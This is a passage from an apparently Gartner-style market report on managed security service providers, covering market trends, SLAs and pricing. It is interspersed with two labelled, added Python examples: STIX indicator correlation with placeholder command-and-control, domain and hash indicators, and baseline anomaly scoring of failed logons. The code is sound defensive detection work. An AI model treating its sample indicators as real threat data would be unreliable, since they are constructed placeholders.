  • Customized requirements: The MSS market is increasingly segmented between providers that focus on a shared-service approach, where offerings are applied homogeneously across customers with minimal, if any, room for customization (generally the purview of the pure-play MSSPs), and the IT outsourcers (ITOs) and NSPs with MSS offerings, which are increasingly focused on providing customized solutions to larger enterprises in order to meet very specific requirements. These typically revolve around support for a wide range of security technologies, especially more “lean forward” technologies that the organization has already deployed, or plans to deploy, but lacks the expertise and skills to run and use. The increasing demand for SOC build-outs in specific regions (e.g., the Middle East and India) is also fueling the demand for customized services in which MSS capabilities may be leveraged, such as providing remote, out-of-business-hours support to complement the on-site provider staff manning a provider-run, customer-specific SOC.
  • First-time/early-cycle MSS customers: The MSS market is still attracting buyers. In both mature and emerging regions, there are organizations that are in their first cycle of building out threat detection and response capabilities. MSS forms a critical part of this because these organizations typically have low organizational competency in security and operate using lean security teams, and are therefore looking for opportunities to outsource security event monitoring, alerting and response. These “first cycle” MSS adopters are driving significant growth for the market.
  • Evolving compliance reporting requirements: Requirements such as GDPR (see “GDPR Clarity: 19 Frequently Asked Questions Answered”), as well as corporate governance policies, are directly driving stronger requirements for threat monitoring, identification and incident response capabilities. As formal compliance regimes become more stringent or more pervasive, organizations are turning to external service providers to address the need to meet compliance requirements.
  • Expansion of security event monitoring into new domains: As organizations adopt cloud services (e.g., SaaS and IaaS predominantly), concerns about the lack of visibility into these environments from a security and risk management perspective are increasing. Customers considering MSS for security services are asking about MSSP capabilities for monitoring these environments.

MSS customers and buyers continue to express dissatisfaction with MSS providers, although they represent the minority. Some of the common reasons for customers switching MSSPs or opting for another delivery model include a lack of perceived value versus the cost of MSSs, providers that fail to detect threats or generate a high level of false positives, and poor quality of service delivery and support during critical incidents. In particular, security and risk management leaders have increasing expectations that their MSSP will act as an extension of their security capabilities or teams to provide incident investigation and response support. These organizations are not resourced to consume only Tier 1 security operations capabilities, where they merely receive notification of an incident and are expected to perform their own incident triage and investigation. That model may be appropriate for large enterprises with adequately resourced security teams that want to, and can, retain responsibility for incident triage, investigation and response.

Alternatives to using an MSSP include:

  • Managed detection and response services: Organizations have been increasingly looking for threat-detection-oriented service providers that offer more turnkey monitoring services coupled with higher-touch services. MDR service providers (see “Market Guide for Managed Detection and Response Services” ) are gaining increasing attention with buyers, particularly in the midsize and smaller enterprises. However, adoption by larger enterprises to augment existing capabilities, especially for advanced threat detection, is also occurring. Many MSSPs have introduced MDR-like services that are turnkey offerings using dedicated technology providers as premium services, but these are primarily focused on advanced threat detection use cases, usually via managed EDR or threat hunting. The use of network technologies for MDR-type services is starting to emerge. Gartner anticipates this trend to continue as MSSPs race to compete with the MDR providers.
  • Remote co-management of a customer’s SIEM solution: Increasingly, buyers across midsize and larger enterprises are purchasing SIEM solutions, but looking for specific service providers to assist. Services available to the buyer range from engineering, tuning and performance monitoring of the customer’s SIEM tool, whether it’s on-premises, hosted by a provider or SaaS SIEM (see “Selecting and Deploying SaaS SIEM for Security Monitoring”), all the way to complete management and 24/7 monitoring and alerting (in effect being an MSS to the customer, just using the customer’s technology). Buyers purchase their own SIEM tools for a variety of reasons (see “How and When to Use Co-managed Security Information and Event Management”). In response to this trend, MSSPs are increasingly adding co-managed SIEM support for two to three SIEM solutions.
  • Organizations building their own, dedicated SOCs: Organizations decide to build and operate their own SOCs because they:
    • Desire more control over their detection and response technologies (either driven internally or due to regulatory requirements)
    • Require better access to their own data (for threat investigations or compliance purposes)
    • Have unique or specialized use cases or environments where more customized correlation/analytics is required (e.g., OT security monitoring requirements)
    • May be unaware of the concept of shared MSS, particularly because providers do not offer it to them. This is particularly true in emerging markets.
    To adapt to these requirements, MSSPs are adding or expanding customized services to customers for SOC build-outs (see “How to Plan, Design, Operate and Evolve a SOC”).

Challenges to using an MSSP include:

  • Ability to deliver “integrated” incident response: MSS buyers should be aware that most MSSPs still have limitations and barriers between the basic triage and customer notification of a potential incident, and specific incident response activities, such as collecting suspect binaries and performing analysis, which is then used to ascertain the type of threat, its sophistication, attribution and scope of distribution inside an organization. Many MSSPs require a customer to purchase an incident response retainer in order to have access to these types of technical incident response functions and experts.
  • Data residency and other privacy requirements: Regulatory requirements regarding movement of and access to specific types of data may limit the scope of monitoring that enterprises can entrust to MSSPs. For example, GDPR may drive more stringent requirements for MSSPs depending on the geography in which the MSS buyer operates.
  • Change in strategy to reduce outsourcing: At the enterprise level or within the security organization, a change in strategy (sometimes driven by changes in leadership) regarding the use of external services can mean that MSSs are not considered effective options.
  • Lack of customization: By definition, MSSs are meant to be standardized in terms of device management, analytics/correlation rules, and reporting and notifications. Customers that want more customization of their security operations may find some MSSPs less than ideal if those MSSPs focus on delivering shared services with little to no customization.

MSSP Landscape

The basic makeup of the MSSP vendor space has not changed fundamentally, as the market is mature. There are three major types of MSSPs. Overlap between these types occurs in the market, but MSSPs tend to fall into one of the categories.

  • Pure plays: These are generally smaller, privately held MSSPs that are completely focused on security services. Most of these MSSPs tend to serve a local market or region, but not all regions around the world. New pure-play security service providers often focus on specific vertical markets (e.g., legal, healthcare providers, energy and utilities) or regulatory requirements, or advanced threat detection technologies (e.g., managed EDR services). Gartner expects existing MSSPs and other IT services firms to acquire pure-play service providers that offer threat-detection-oriented services and advanced threat detection capabilities, especially those in the MDR space.
  • NSPs: These are network bandwidth and connectivity providers that manage and monitor network security products. They often provide remote monitoring, premises-based technologies and cloud-based services through their internet connections. Buyers that consume managed telecommunications services tend to include MSS when available, as firewalls and other network-based security technologies can be a core component of the outsourcing deals.
  • ITOs/system integrators/business process outsourcers: These are IT services providers that typically manage security devices as part of large outsourcing or system integration initiatives, where it makes sense for buyers to consume MSS as part of broad infrastructure management and monitoring deals.

In addition to the above common types of MSSPs, security consulting providers and some product vendors are emerging entrants offering MSSs. Security consulting providers have realized that MSS and ongoing security operations contracts are a more profitable, predictable and faster-growing revenue stream than one-off consulting projects. Many of these consultants are more active in dedicated SOC staffing services than MSS, but this is still a category of providers to watch. Also worth noting is that many IT outsourcers with security consulting businesses are also becoming more active as MSSPs, through either acquisitions or the organic build-out of capabilities.

Some product vendors such as Cisco, CrowdStrike, F-Secure, FireEye and Rapid7 (among others) also offer MSS and/or MDR services. The primary motivation for these technology vendors in entering this market has been to increase their recurring revenue by attaching more annuity-based services to one-time product sales. Also, for new product areas in security (like EDR), offering managed services allows customers to better utilize the underlying technology product (because it can be more complex and time-consuming than anticipated once fully deployed) and helps them overcome skills shortages associated with newer security technology areas. However, product vendors are still very much a niche play in the broader MSS market.

MSS Portfolio

The services that are core to MSS offerings involve vendor-agnostic monitoring and management of core security technologies, with a focus on:

  • Firewalls and next-generation firewalls (NGFs)
  • Network IDPSs and next-generation IDPS
  • Multifunction firewalls/UTMs
  • SWGs and URL filters
  • EPPs

MSSPs also tend to support a broad scope of security and non-security-type data sources for security event monitoring. The event sources may include network devices (e.g., VPN devices, routers and switches), logs from user directory services (e.g., Active Directory), and host OS logs and application-specific logs. In the past couple of years, MSSPs have introduced services to manage and monitor both proprietary and commercial technologies designed to detect and protect against advanced threats. These services analyze payloads to detect malicious software and monitor activity and behavior of network traffic (e.g., network traffic analysis [NTA] tools) and endpoints (e.g., EDR agents). In addition to monitoring, many MSSPs have management services for those technologies (usually under their “MDR services”).

MSSPs may also provide cloud or SaaS-based services, including:

  • Vulnerability scanning
  • Network-based firewall/IDP
  • Web filtering/SWG
  • CASB
  • Email security
  • DDoS mitigation

Among organizations that have deployed a SIEM solution, Gartner sees increasing interest in services to monitor or run the SIEM. MSSPs continue to add offerings to support customer-deployed SIEM to accommodate these customers, either in a more customized model or until the customer can be transitioned off their SIEM tool and onto the MSSP’s delivery platform.

Incident Response Services

Most MSSPs offer incident response capabilities to assist customers with investigation and remediation activities. Gartner clients, in light of significant breaches in the news over the last 12 months, are interested in adding retainers for digital forensics and incident response (DFIR) services. MSS customers in many cases look to their provider for these services. These activities are available as proactive- and reactive-oriented services, delivered primarily remotely, but on-site as needed. These services are typically available on a consulting basis, and can be purchased as needed, or via a retainer for a set number of hours, with service-level commitments for response time for both remote and on-site support. Prospective customers should confirm with MSSP candidates how much response support is available within the context of the standard monitoring services, and when engaging the incident response retainer is required (for example, does the customer have to authorize use of the hours, or is it preagreed how the MSSP can use those hours?). SLAs are also commonly provided for both remote and on-site support. Customers should confirm the SLAs provided and the penalties if SLAs are missed. If the MSSP offers packaged or prepaid retainer hours for incident response activities, then customers should confirm whether those hours are available for other security services if they are not needed for incident response (e.g., through proactive services).

Threat Intelligence Capabilities and Services

Requirements for how MSSs leverage threat intelligence, and what premium threat intelligence services are available, appear on Gartner clients’ RFPs with increasing frequency. Buyers are specifically interested in how MSSPs are leveraging threat intelligence (e.g., to improve the prioritization and context around detected incidents). Additionally, rather than procuring advanced or customer-specific threat intelligence services from a third party, MSS buyers are looking first at the capabilities of the MSSP, through subscription-based services. Several MSSPs have dedicated security and threat-oriented research teams to improve their visibility of the threat landscape — that is, the identities, motives, targets, and tactics, techniques, and procedures of external attackers. These services feed their MSS capabilities, but also tend to be resold as advanced threat intelligence offerings, such as customer-specific dark web monitoring services. Those that do not have their own threat research groups often use a mix of one or more third-party threat intelligence providers along with open-source threat intelligence. MSSPs are increasing their support for common threat intelligence description and sharing formats, such as Structured Threat Information Expression (STIX) and Trusted Automated Exchange of Indicator Information (TAXII). In the last 12 months, a few MSSPs have also introduced threat intelligence platforms as part of their overall delivery platforms (see “Market Guide for Security Threat Intelligence Products and Services”). As their use and the maturity of these tools increase, Gartner expects to see improved capabilities for customers to securely share and allow the MSS to consume provided threat intelligence. Buyers with requirements for this level of sharing should confirm with prospective MSSPs if they already have this capability, and if not, where it is in their roadmap.
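To make concrete what consuming STIX-formatted intelligence looks like on the monitoring side, here is an added example (not Gartner's or any MSSP's code) that reads a STIX 2.1 bundle of the kind a TAXII feed would deliver, pulls the observable values out of simple single-comparison indicator patterns, and correlates them against a handful of log events. The bundle, the event records, their field names (src_ip, dst_ip, query, sha256) and every IP, domain, hash and UUID in it are constructed placeholders, not real indicators; a full STIX pattern grammar (AND/OR, comparison operators, observation expressions) is deliberately out of scope and such indicators are skipped rather than half-matched.

```python
"""Correlate STIX 2.1 indicators against log events (added example).

Constructed sample data throughout: the bundle IDs are placeholder UUIDs,
203.0.113.7 / bad.example / the hash are documentation placeholders, and
the event field names are an assumed log schema, not a standard one.
Only patterns of the form [object:path = 'value'] are handled.
"""
import json
import re
from typing import Dict, List, Tuple

SAMPLE_BUNDLE_JSON = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000002",
         "created": "2018-04-01T00:00:00.000Z", "modified": "2018-04-01T00:00:00.000Z",
         "name": "constructed C2 address", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '203.0.113.7']",
         "valid_from": "2018-04-01T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000003",
         "created": "2018-04-01T00:00:00.000Z", "modified": "2018-04-01T00:00:00.000Z",
         "name": "constructed malicious domain", "pattern_type": "stix",
         "pattern": "[domain-name:value = 'bad.example']",
         "valid_from": "2018-04-01T00:00:00Z"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000004",
         "created": "2018-04-01T00:00:00.000Z", "modified": "2018-04-01T00:00:00.000Z",
         "name": "constructed file hash", "pattern_type": "stix",
         "pattern": "[file:hashes.'SHA-256' = '" + "ab" * 32 + "']",
         "valid_from": "2018-04-01T00:00:00Z"},
        # Compound pattern: outside this example's scope, so it must be skipped.
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--00000000-0000-4000-8000-000000000005",
         "created": "2018-04-01T00:00:00.000Z", "modified": "2018-04-01T00:00:00.000Z",
         "name": "constructed compound pattern", "pattern_type": "stix",
         "pattern": "[ipv4-addr:value = '198.51.100.5' AND network-traffic:dst_port = 4444]",
         "valid_from": "2018-04-01T00:00:00Z"},
    ],
})

# Constructed log events in an assumed normalized schema.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "evt-1", "type": "fw", "src_ip": "10.0.0.12", "dst_ip": "203.0.113.7"},
    {"id": "evt-2", "type": "dns", "src_ip": "10.0.0.15", "query": "BAD.example"},
    {"id": "evt-3", "type": "dns", "src_ip": "10.0.0.15", "query": "good.example"},
    {"id": "evt-4", "type": "edr", "sha256": "ab" * 32},
]

# Which event fields each STIX object path is compared against (an assumption
# about the log schema above).
FIELD_MAP: Dict[str, Tuple[str, ...]] = {
    "ipv4-addr:value": ("src_ip", "dst_ip"),
    "domain-name:value": ("query",),
    "file:hashes.'SHA-256'": ("sha256",),
}

# Matches exactly one comparison: [ <object path> = '<value>' ]
SIMPLE_PATTERN = re.compile(r"^\[\s*([A-Za-z0-9_.:'-]+)\s*=\s*'([^']*)'\s*\]$")


def extract_indicators(bundle_json: str) -> Dict[Tuple[str, str], str]:
    """Return {(object_path, value): indicator_id} for every indicator whose
    STIX pattern is a single equality comparison; anything else is skipped."""
    bundle = json.loads(bundle_json)
    indicators: Dict[Tuple[str, str], str] = {}
    for obj in bundle.get("objects", []):
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        m = SIMPLE_PATTERN.match(obj.get("pattern", ""))
        if m is None:
            continue  # compound or unsupported pattern
        indicators[(m.group(1), m.group(2))] = obj["id"]
    return indicators


def correlate(events: List[Dict[str, str]],
              indicators: Dict[Tuple[str, str], str]) -> List[Tuple[str, str, str, str]]:
    """Return (event_id, indicator_id, field, value) for every event field
    equal (case-insensitively) to an indicator value."""
    hits = []
    for ev in events:
        for (path, value), ind_id in indicators.items():
            for field in FIELD_MAP.get(path, ()):
                if str(ev.get(field, "")).lower() == value.lower():
                    hits.append((ev["id"], ind_id, field, value))
    return hits


if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS, extract_indicators(SAMPLE_BUNDLE_JSON)):
        print("match:", hit)
```

Running it reports matches for evt-1 (destination IP), evt-2 (domain, matched case-insensitively) and evt-4 (file hash), leaves evt-3 untouched, and silently drops the compound indicator; an MSSP's platform would surface that last case as an unsupported-pattern count so that buyers asking "which of my feed's indicators are actually being applied" can get an answer.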

MSS Delivery

Managed Service Portal Functionality

Buyers should apply significant focus to methods of communication with their provider, as this enables measurable recognition of value received. A key way to orchestrate efficient two-way recorded dialogue between outsourced security professionals and internal teams is through a fully featured portal. Any portal should provide multirole and granular access control, and dashboards with information preconfigured and adaptable to fit many different roles and functions within your organization, including those within senior risk management. Fully interactive incident ticketing with features for handover and resolution tracking provides buyers with a method not only to improve the service that the provider is operating through enrichment and semantic learning, but also to track and manage ROI in an area visible to both parties. Important features of provider portals also include the ability to search through security data and carry out threat hunting through fast and intuitive interfaces, as well as seamless cross-service and function integrations with other security services and information, such as vulnerability scanning outputs and threat intelligence indicators.

Buyers should consider the quality and functionality of the provider portal to be a high-priority element in their decision to procure any MSS, as this becomes the outlet and store for all content that the service produces and is measured by.

Security Operations Centers

All MSSPs leverage SOCs as the physical locations from which they deliver 24/7 services. MSSPs use different patterns for service delivery: usually either a single SOC operating round the clock; a follow-the-sun approach, in which each SOC operates during its local business hours seven days per week (or steps in for resiliency as needed); or a hybrid of these two models. Each has its strengths and weaknesses. For example, technically a SOC in one region can support a customer in another; however, there are potentially significant roadblocks in the form of language, time zones and regulations that need to be considered. On the other hand, better service may be achieved when the MSSP uses a follow-the-sun model, which can alleviate the SOC analyst quality issues that arise when analysts have to work nights and weekends (see “How to Plan, Design, Operate and Evolve a SOC”). MSS buyers need to carefully evaluate the SOC locations and operating models used by MSSPs to ensure they will meet their requirements.

Threat Detection and Advanced Analytics Capabilities

Many MSSPs claim capabilities to assist their customers in addressing advanced attacks, in addition to their abilities to detect common, broad-based threats. These capabilities may be visible as discrete service offerings or options, or as features embedded in existing offerings. They may include, for example:

  • Correlation of events with threat intelligence that can provide attribution (e.g., to a broad-based malware family versus a known hacking group)
  • Analysis of activity patterns (across an MSS customer base as well as within the customer environment) to identify outliers, exceptions or deviations from baselines in security events, network traffic, or the activity of users or entities on the network
  • Analysis of user behavior to identify anomalies from normal behavior across environments (on-premises, cloud) — this is an emerging area that is currently supported by very few MSSPs

The adoption of big data technologies like Hadoop, Elasticsearch and NoSQL is permeating MSS. This makes sense as MSSPs have historically had to deal with “big data problems” — a large volume, velocity and variety of log event and other data. These technologies are being used to help MSSPs better manage and analyze the large amounts and various types of data acquired from their customers, and to make it more accessible (e.g., via real-time search as opposed to scheduled search jobs) and for longer periods of time than what has been previously available. However, the time horizon to search over those logs continues to stay relatively stable, with 90 days of online data being the norm and data older than that being relegated to warm or offline storage. The adoption of big data technologies is also fueling a drive to improve threat detection capabilities through advanced analytics; however, it’s still early days.

As big data technologies are being adopted, advanced analytics are being used in back-end systems to complement traditional real-time security event correlation and monitoring capabilities. Batch-oriented analytics that can be run over much larger datasets covering weeks or months of data, commonly using machine-learning-based approaches, are being employed. Gartner recommends that customers ask for specific information and evidence where advanced analytics is being used as a means of differentiating and comparing service offerings across providers. Most MSSPs claim that the customer won’t be able to determine, based on the alerts they are notified with, whether the event was detected using standard methods, such as correlation or threat intelligence matches, or if it was via a more advanced method (e.g., anomalous activity detected using a supervised machine learning approach). Buyers should also ask about how a provider leverages advanced analytics methods. For example, is the capability through a commercially available technology that is managed by the provider, or has the provider actually invested in R&D to customize and tune a commercial (or proprietary) analytics technology?
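The second bullet above, deviation from a per-source baseline, is the kind of analytic a buyer can reasonably ask a provider to explain. As an added example, not code from Gartner or any MSSP, the block below builds a robust baseline (median and median absolute deviation) from a 14-day history of failed-logon counts per host and scores the current day against it. The hosts, counts and thresholds are constructed sample data; the floor on the spread handles the real-world edge case of a source whose baseline is flat (all zeros), where a plain standard deviation would divide by zero.

```python
"""Baseline-deviation scoring over per-source event counts (added example).

Constructed sample data: 14 days of failed-logon counts per host followed
by the day under evaluation. The MAD_SCALE constant is the usual factor
that makes the median absolute deviation comparable to a standard
deviation for normally distributed data.
"""
import statistics
from typing import Dict, List, Optional, Tuple

SAMPLE_HISTORY: Dict[str, List[int]] = {
    "host-a": [12, 9, 14, 11, 10, 13, 12, 8, 11, 12, 10, 9, 13, 11],  # steady, noisy
    "host-b": [3, 2, 4, 3, 3, 2, 4, 3, 2, 3, 4, 3, 2, 3],             # steady, quiet
    "host-c": [0] * 14,                                                # flat baseline
}
SAMPLE_TODAY: Dict[str, int] = {"host-a": 15, "host-b": 41, "host-c": 6, "host-d": 2}

MAD_SCALE = 1.4826
MIN_HISTORY_DAYS = 7


def robust_baseline(history: List[int]) -> Tuple[float, float]:
    """Median and median absolute deviation of the history window.
    Medians are used so that a single past spike does not inflate the baseline."""
    med = statistics.median(history)
    mad = statistics.median(abs(x - med) for x in history)
    return med, mad


def deviation_score(value: int, history: List[int], floor: float = 1.0) -> float:
    """Signed number of robust 'standard deviations' the value sits above
    the baseline. The floor keeps a flat history (MAD == 0) from producing
    a division by zero or an infinite score."""
    med, mad = robust_baseline(history)
    spread = max(MAD_SCALE * mad, floor)
    return (value - med) / spread


def evaluate(today: Dict[str, int], history: Dict[str, List[int]],
             threshold: float = 3.0) -> Dict[str, Tuple[Optional[float], bool]]:
    """Return {source: (score, flagged)}. Sources with too little history get
    (None, False) rather than a score built on a handful of samples."""
    results: Dict[str, Tuple[Optional[float], bool]] = {}
    for source, value in today.items():
        hist = history.get(source, [])
        if len(hist) < MIN_HISTORY_DAYS:
            results[source] = (None, False)
            continue
        score = deviation_score(value, hist)
        results[source] = (round(score, 2), score > threshold)
    return results


if __name__ == "__main__":
    for src, (score, flagged) in evaluate(SAMPLE_TODAY, SAMPLE_HISTORY).items():
        print(f"{src}: score={score} flagged={flagged}")
```

On the sample data host-a's 15 failures score about 2.7 and stay under the threshold, host-b's jump from a baseline of 3 to 41 is flagged, host-c is flagged because any activity on a previously silent source clears the floored spread, and host-d is reported as unscored for lack of history. Whether an alert of this kind is labelled as "anomaly" or folded into a generic notification is exactly the transparency question the paragraph above suggests buyers raise.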

Monitoring Beyond On-Premises Customer Environments

SaaS visibility is top of mind with Gartner clients interested in MSS, with IaaS second. Use of popular SaaS like Office 365, Salesforce, Box and Workday is driving the demand. MSSPs are slowly adding support, via partnerships, for CASBs to provide SaaS security monitoring, but few Gartner clients report interest in this approach. Most clients are expecting native API-based approaches to be used as part of the core security event monitoring capabilities. The approach is mixed across MSSPs. Some claim support for APIs, others rely on the use of a CASB solution and a few offer both, depending on the level of event monitoring required by the buyer.

Most MSSPs have focused on the monitoring of assets located in public cloud services, such as AWS and Azure, by leveraging a mix of external security controls deployed in the public cloud and native API-based security integrations (e.g., AWS CloudTrail). Support for Azure has increased over the past 12 months, but AWS is still the most supported environment. Few MSSPs have support for IaaS security products like cloud workload protection platforms (see “Market Guide for Cloud Workload Protection Platforms”).

There is another dimension to cloud security, and that is security services delivered from the cloud (e.g., security as a service). Some MSSPs support established security-as-a-service technologies (e.g., SWGs and secure email gateways [SEGs]). For example, many of the pure-play providers with their own technology portfolios, and NSPs through partnerships with cloud-based SWG providers, offer management and monitoring services for those deployment modes.

Pricing Models

There are several pricing models used by MSSPs, leading to confusion among buyers as to which approach is most appropriate and making it difficult to compare pricing across competing providers. A majority of MSSPs offer a pricing model based on the type and size of the security technology to be monitored and/or managed for customer-owned security technologies, devices and other log sources. Log collection is typically priced by the number and types of sources, or by the number of events per time period (device count pricing includes implicit expectations of event volumes). There is often a clear distinction between technology that is monitored in real time and subject to alerting SLAs, and technology that is not — that is, where logs are collected and subject to reporting or querying, but not to real-time correlation and analyst review.

Alternative models are also being seen in the market. Gartner expects to see new pricing models introduced as a competitive advantage, and to reduce the complexity and friction with selling MSSs:

  • Data volume or velocity: Providers, especially those using a commercial SIEM solution as part of their delivery platform, are pricing MSSs based on the average volume of data collected over a time period (such as gigabytes per day) or the velocity of data sent to the MSS for analysis (usually measured as log events sent per second or daily). This model allows customers to pay based on the actual amount of data provided to the service provider for analysis, rather than the number or type of data sources. This is not a dominant model in the market. Issues with this model include a lack of control over the amount of data being generated (e.g., during a DDoS attack) and that not all data provides equal benefits, but customers pay the same rate for data collected and analyzed (e.g., web proxy versus DNS events).
  • Per log event source pricing: This pricing model is based on the total number of sources sending data to the MSSP. In this model, all data sources, regardless of how much log and event data they generate, are treated equally. This is sometimes provided as an enterprisewide license model too.
  • Per incident: In this approach, customers are charged based on the number of incidents that are detected and number of alerts notified.
  • Per user or asset: This approach is based on the number of users or assets inside an organization, and based on analytics activities (such as running specific algorithms against a volume of data).

Device management pricing is typically based on the number of configuration changes to be performed within a period of time. This model offers a fairly straightforward means for potential customers to determine the cost of a service and allows comparison across potential providers. A potential issue with this model is that, where customers have high-capacity event sources that are underutilized, they pay for the potential capacity, rather than actual usage of those devices.

Service-Level Agreements

Gartner clients need to be aware of the SLAs offered by MSSPs, as they are a continuing source of misunderstanding by buyers and differences exist across providers. SLAs are commonly offered for monitoring and managed services. Usually, a vendor segregates the SLAs into three to five response levels measured against a specific severity (e.g., urgent, high, medium, low). In many cases, the monitoring and response severities are aligned to managed device SLAs too.

MSS buyers need to confirm the tiers and associated SLAs for the services they plan to buy. Many MSSPs offer various tiers of service at different price points with varying SLAs (e.g., more expensive service will have shorter response times). MSS buyers should confirm the options available with the providers and evaluate which tier they are being quoted, and whether fewer tiers of service might be acceptable given the trade-offs between risks and costs. SLA rightsizing is a critical part of getting the most value from an MSSP. It is also important to confirm how the SLA is measured and calculated. For example, does the clock on an SLA start when the incident is detected by an automated system, when the incident is picked up from a queue of unassigned events by an analyst, or from the time an analyst has established that there is an incident worth notifying the customer about?

Most MSSPs offer standard SLAs; however, some negotiate SLAs on a customer-by-customer basis, while a few others still negotiate custom SLAs for each customer. MSS buyers consuming these services as part of broader IT outsourcing contracts need to be doubly cautious about defining the right SLAs. Gartner has observed several risk areas in such engagements — from providers carrying forward generic SLAs to weak service definitions to poor reimbursements and remediation. Finally, MSS buyers need to confirm whether a provider offers any reimbursements for missed SLAs. Some MSSPs offer credits against future payments for missed SLAs, but this is not common practice across the industry. These can scale to become more severe for multiple occurrences of SLA noncompliance. However, there is usually a limit on how many credits can be provided, such as not exceeding a certain percentage of the total monthly or annual charges. Also, sometimes there are earn-back provisions that forgive remedies based on improved performance by the MSSP. It is important to note that, in most cases, it is the customer’s responsibility to notify the service provider of any proposed SLA violation within a set time period of the date on which the proposed violation occurred. At a minimum, the provider should have capabilities for performing a root cause analysis and offering root cause elimination as part of its SLA conformance.

MSSP Market Activity in 2017

The global MSSP market in 2017 was stable. CSC and HPE Enterprise Services formally merged as DXC Technology in April 2017.

MSSPs Not Evaluated in the Magic Quadrant

Not included in this Magic Quadrant analysis are smaller, region-, country-level and local-area MSS providers, which can include small pure plays and larger providers that do not have enough MSS business in multiple regions to meet the inclusion criteria (although they may be a good choice for buyers that don’t require a global footprint and would prefer a more “local” provider). Also excluded from this analysis are service providers that provide MSSs only for their own technologies, and that do not deliver services for third-party commercial technology (for example, MDR service providers). Providers with security services that are sold and delivered primarily with infrastructure outsourcing, staff augmentation or account-dedicated resources are also not included in this Magic Quadrant.

Evidence

  • Gartner customer inquiries and information sharing related to MSSPs
  • Analyst interactions with Gartner customers via inquiries and meetings
  • Survey of MSSPs
  • Survey of MSS reference customers
  • Gartner Peer Insights

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.